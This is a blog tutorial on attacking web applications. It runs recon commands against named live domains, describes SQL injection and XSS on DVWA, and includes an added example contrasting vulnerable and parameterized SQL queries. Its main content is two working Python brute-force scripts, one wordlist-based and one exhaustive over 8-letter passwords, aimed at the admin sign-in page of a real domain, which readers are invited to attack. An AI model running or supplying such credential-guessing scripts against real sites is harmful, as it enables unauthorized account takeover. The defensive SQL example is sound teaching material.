Exploiting Web Applications
Created On 30. Apr 2020
Updated: 2021-05-01 23:44:40.875422000 +0000
Created By: acidghost
Exploiting web applications can be a lot of fun as well. Here are some simple tools you can use to get a better idea of the vulnerabilities of a web app.
whatweb reports the application hosted on a domain, the server type and IP, and in some cases the versions of the languages behind the framework.
Run it like this against this blog:
# whatweb zonaincognita.com
That is somewhat interesting, but let's check something else.
# whatweb mechaplay.com
Here we additionally see the PHP and jQuery versions, and I really tried to beef it up with a lot of plugins and whatnot. Well, that's WordPress for you.
wafw00f is a tool for detecting web application firewalls. It's built into Kali and you can launch it like this:
# wafw00f http://zonaincognita.com
lbd helps find out whether a domain is using DNS or HTTP load balancing.
Check this out:
# lbd www.zonaincognita.com
httrack copies a website.
Install it like this:
# sudo apt-get install httrack
# httrack "http://zonaincognita.com" -O "/tmp/httrack" -v
Careful, as this operation might consume all your memory.
This tool checks the certificate details by querying the SSL service. We'll check that when SSL is properly enabled here ;)
DVWA On Metasploitable
We will check the Metasploitable system later in more detail. Meanwhile, here is a short reference about its Damn Vulnerable Web App and the kinds of exploits that can be executed against it.
This type of attack injects a piece of code that alters the query the web application sends to its back-end database. This is called tautological injection, and it is one of the most frequent types of SQL injection. An example is 1 or 0=0, an unconditionally true expression which, if injected into a SQL query, will reveal database table rows and bypass authentication.
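As an added example (not part of the original post), the tautology from the paragraph above run against a constructed in-memory SQLite table: the lookup built by string formatting returns every row when given 1 or 0=0, while the lookup that validates the id as an integer and binds it as a parameter returns nothing. The table name and its rows are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample rows standing in for an app's users table; not real data.
USERS = [(1, "admin@example.com"), (2, "editor@example.com"), (3, "guest@example.com")]


def make_db():
    """Create an in-memory database holding the sample table (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin_users (id INTEGER PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO admin_users VALUES (?, ?)", USERS)
    return db


def lookup_vulnerable(db, user_id):
    """Builds the SQL text with string formatting, so the input is parsed as SQL.
    '1 or 0=0' turns the WHERE clause into 'id = 1 or 0=0', which is always true."""
    sql = "SELECT id, email FROM admin_users WHERE id = %s" % user_id
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """Validates the type first and binds the value as a parameter, so the
    input can only ever be data: a non-integer id matches nothing."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, email FROM admin_users WHERE id = ?"
    return db.execute(sql, (uid,)).fetchall()


def demo():
    """Run both lookups with a normal id and with the tautology."""
    db = make_db()
    return {
        "vuln_normal": lookup_vulnerable(db, "1"),
        "vuln_tautology": lookup_vulnerable(db, "1 or 0=0"),
        "safe_normal": lookup_safe(db, "1"),
        "safe_tautology": lookup_safe(db, "1 or 0=0"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```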
Cross-site scripting attacks work in the following ways:
1. Execute scripts from text fields on a website. For example, if the site is prone to XSS, this script pasted into the text field and executed will pop up an alert:
2. Defacement attacks that load a website in the text box:
3. Upload a malicious script if the type of uploaded files is not screened.
4. Command execution: execute scripts, or see the contents of files on the target system itself.
Brute forcing this blog
There is no fun without actually trying to break something, right?
I encourage you to try to crack the password of my blog with scripts such as the ones below.
We are using the mechanize Python module to navigate through the pages and read the candidate words from a 'passwords.txt' wordlist, iterating over its lines.
You can similarly go with a list of emails for the email field. Now you know better why hackers steal emails and how they are being used. On the black market you can get lists of 50K email and password combinations for less than $1. Are you in there as well? I found that there have been multiple instances of my accounts being pwned. Happens to all of us.
The result will be written to a txt file with the attack number appended to the end of the filename. Never mind the long path, that's just for fun :feelsgood:
import mechanize

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
attackNumber = 1

with open('passwords.txt') as f:
    for lines in f:
        # strip the trailing newline, otherwise every candidate is submitted with '\n' appended
        password = lines.rstrip('\n')
        browser.open(url)
        browser.select_form(nr=0)  # the first form on the page is the sign-in form
        browser["admin_user[email]"] = 'my email here'
        browser["admin_user[password]"] = password
        res = browser.submit()
        content = res.read()
        print(res.code)
        # save the response body as responseN.txt ('wb' because read() returns bytes on Python 3)
        with open('response' + str(attackNumber) + '.txt', 'wb') as output:
            output.write(content)
        attackNumber += 1
Here is the same script, but this time we let it generate the candidates for us, assuming the password consists of ASCII lowercase letters and is 8 characters long:
import mechanize
from itertools import product
from string import ascii_lowercase

url = "http://zonaincognita.com/noautomationorencryptionorwhatsoeveranywayhereisasuperlongpathforyouwhichis318bits/admin_users/sign_in"
browser = mechanize.Browser()
attackNumber = 1
# every 8-character string of lowercase letters: product() with repeat=8 yields the full
# 26**8 keyspace, whereas combinations() would only yield sorted tuples of distinct letters
passwords = (''.join(p) for p in product(ascii_lowercase, repeat=8))

for password in passwords:
    browser.open(url)
    browser.select_form(nr=0)  # the first form on the page is the sign-in form
    browser["admin_user[email]"] = 'the email comes here'
    browser["admin_user[password]"] = password
    res = browser.submit()
    content = res.read()
    print(res.code)
    # save the response body as responseN.txt ('wb' because read() returns bytes on Python 3)
    with open('response' + str(attackNumber) + '.txt', 'wb') as output:
        output.write(content)
    attackNumber += 1
On a successful login the response will contain 'Signed in successfully'; otherwise it will contain 'Invalid email or password'.